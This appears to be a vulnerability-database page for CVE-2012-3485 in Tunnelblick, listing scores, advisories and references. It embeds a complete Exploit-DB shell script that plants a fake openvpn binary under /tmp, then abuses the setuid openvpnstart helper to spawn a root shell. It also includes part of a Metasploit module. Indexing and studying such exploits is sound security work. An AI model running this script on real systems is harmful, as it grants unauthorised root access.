CVE-2012-3485
Published 2012-08-26
Priority: P3 (36) · high · 7.2 (CVSS 2.0)
CVSS vector: AV:L/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 3.78% (88.6th percentile)
Tunnelblick 3.3beta20 and earlier relies on argv[0] to determine the name of an appropriate (1) kernel module pathname or (2) executable file pathname, which allows local users to gain privileges via an execl system call.
Affected
1 range
| Vendor / Product | Version range | Fixed in |
|---|---|---|
| tunnelblick | <= 3.3beta20 | — |
GHSA
GHSA-rvmj-pg73-4rvj · CVE-2012-4676 [HIGH] CWE-59
ghsa_unreviewed · 2022-05-17 · CVSS 7.2
The errorExitIfAttackViaString function in Tunnelblick 3.3beta20 and earlier allows local users to delete arbitrary files by constructing a (1) symlink or (2) hard link, a different vulnerability than CVE-2012-3485.
GHSA
GHSA-5x92-v869-v38r · CVE-2012-3485 [HIGH] CWE-20
ghsa_unreviewed · 2022-05-17
Tunnelblick 3.3beta20 and earlier relies on argv[0] to determine the name of an appropriate (1) kernel module pathname or (2) executable file pathname, which allows local users to gain privileges via an execl system call.
No detection rules found.
Exploit-DB
Tunnelblick - Setuid Privilege Escalation (Metasploit)
exploitdb · 2013-03-05 · CVE-2012-3485
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/exploit/exe'
class Metasploit4 'Setuid Tunnelblick Privilege Escalation',
'Description' => %q{
This module exploits a vulnerability in Tunnelblick 3.2.8 on Mac OS X. The
vulnerability exists in the setuid openvpnstart, where an insufficient
validation of path names allows execution of arbitrary shell scripts as root.
This module has been tested successfully on Tunnelblick 3.2.8 build 289
Exploit-DB
Tunnelblick - Local Privilege Escalation (2)
exploitdb · 2012-08-11 · CVE-2012-3485
---
#!/bin/sh
#### Pwnnel Blicker ####
# for kids #
# #
# zx2c4 #
# #
########################
# This is another exploit for Tunnel Blick.
# Other exploits for Tunnel Blick are available here:
# http://git.zx2c4.com/Pwnnel-Blicker/tree/
echo "[+] Making vulnerable directory."
mkdir -pv /tmp/pwn/openvpn/openvpn-0
echo "[+] Preparing payload."
cat > /tmp/pwn/openvpn/openvpn-0/openvpn <<_EOF
#!/bin/sh
echo "[+] Cleaning up."
rm -rfv /tmp/pwn
echo "[+] Getting root."
exec bash
_EOF
chmod -v +x /tmp/pwn/openvpn/openvpn-0/openvpn
echo "[+] Creating symlink."
ln -s -v -f /Applications/Tunnelblick.app/Contents/Resources/openvpnstart /tmp/pwn/start
echo "[+] Triggering vulnerable program."
exec /tmp/pwn/start OpenVPNInfo 0
Metasploit
Setuid Tunnelblick Privilege Escalation
metasploit
This module exploits a vulnerability in Tunnelblick 3.2.8 on Mac OS X. The vulnerability exists in the setuid openvpnstart, where an insufficient validation of path names allows execution of arbitrary shell scripts as root. This module has been tested successfully on Tunnelblick 3.2.8 build 2891.3099 over Mac OS X 10.7.5.
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/fulldisclosure/2012-08/0122.html
http://code.google.com/p/tunnelblick/issues/detail?id=212
http://git.zx2c4.com/Pwnnel-Blicker/tree/pwnnel-blicker-for-kids.sh
http://www.exploit-db.com/exploits/24578
http://www.openwall.com/lists/oss-security/2012/08/14/1